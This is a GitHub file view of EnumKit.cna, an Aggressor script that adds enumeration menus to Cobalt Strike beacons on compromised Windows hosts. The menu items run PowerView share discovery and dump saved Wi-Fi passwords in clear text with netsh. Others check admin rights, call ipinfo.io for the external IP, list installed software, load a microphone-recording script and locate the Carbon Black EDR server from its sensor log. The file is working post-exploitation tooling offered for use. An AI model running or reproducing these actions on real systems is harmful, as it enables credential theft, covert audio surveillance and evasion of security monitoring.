-
Notifications
You must be signed in to change notification settings - Fork 25
/
Copy pathEnumKit.cna
77 lines (76 loc) · 2.55 KB
/
EnumKit.cna
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
# Actions in this kit center around host and network enumeration. Credential enumeration actions should go in CredKit instead.
# @Und3rf10w
popup beacon_bottom {
menu "EnumKit" {
menu "PowerView"{
item "List accessible shares"{
local('$bid');
foreach $bid ($1){
binput($1, "powershell-import PowerView.ps1");
bpowershell_import($1, script_resource("EnumKit/scripts/PowerView.ps1"));
binput($1, "powershell Invoke-ShareFinder -CheckShareAccess");
bpowershell($1, "Invoke-ShareFinder -CheckShareAccess");
}
}
}
item "Determine Architecture (64 vs 32)" {
local('$bid');
foreach $bid ($1){
binput($1, "Get OS Architecture");
bshell($1, "wmic os get osarchitecture");
}
}
item "Show Host Uptime" {
local('$bid');
foreach $bid ($1){
binput($1, "Get Host Uptime");
bpowershell($1, "net statistics server| Select-String \"Statistics since\"");
}
}
item "List WLAN Profiles"{
local('$bid');
foreach $bid ($1){
binput($1, "shell netsh wlan show profiles name=\"*\" key=clear");
bshell($1, "netsh wlan show profiles name=\"*\" key=clear");
}
}
item "Is User Local Admin?"{
local('$bid');
foreach $bid ($1){
binput($1, "powershell Is-UserLocalAdmin");
bpowershell($1, "([Security.Principal.WindowsPrincipal] [Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] \"Administrator\")");
}
}
item "ipinfo.io Check"{
local('$bid');
foreach $bid ($1){
binput($1, "powershell (New-Object System.Net.WebClient).DownloadString(\"http://ipinfo.io\")");
bpowershell($1, "(New-Object System.Net.WebClient).DownloadString(\"http://ipinfo.io\")");
}
}
item "List Installed Applications"{
local('$bid');
foreach $bid ($1){
binput($1, "shell wmic product get Name,Version,Description /format:csv");
bshell($1, "wmic product get Name,Version,Description /format:csv");
}
}
item "Import Get-MicrophoneAudio"{
local('$bid');
foreach $bid ($1){
binput($1, "powershell-import Get-MicrophoneAudio.ps1");
bpowershell_import($1, script_resource("EnumKit/scripts/Get-MicrophoneAudio.ps1"));
blog($1, "Once imported, run \c8Get-Help Get-MicrophoneAudio -full\c0 for full usage instructions");
}
}
menu "Carbon Black"{
item "Get CB Server Location"{
local('$bid');
foreach $bid ($1){
binput($1, "shell type C:\\Windows\\CarbonBlack\\Sensor.LOG | findstr SensorBackendServer");
bshell($1, "type C:\\Windows\\CarbonBlack\\Sensor.LOG | findstr SensorBackendServer");
}
}
}
}
}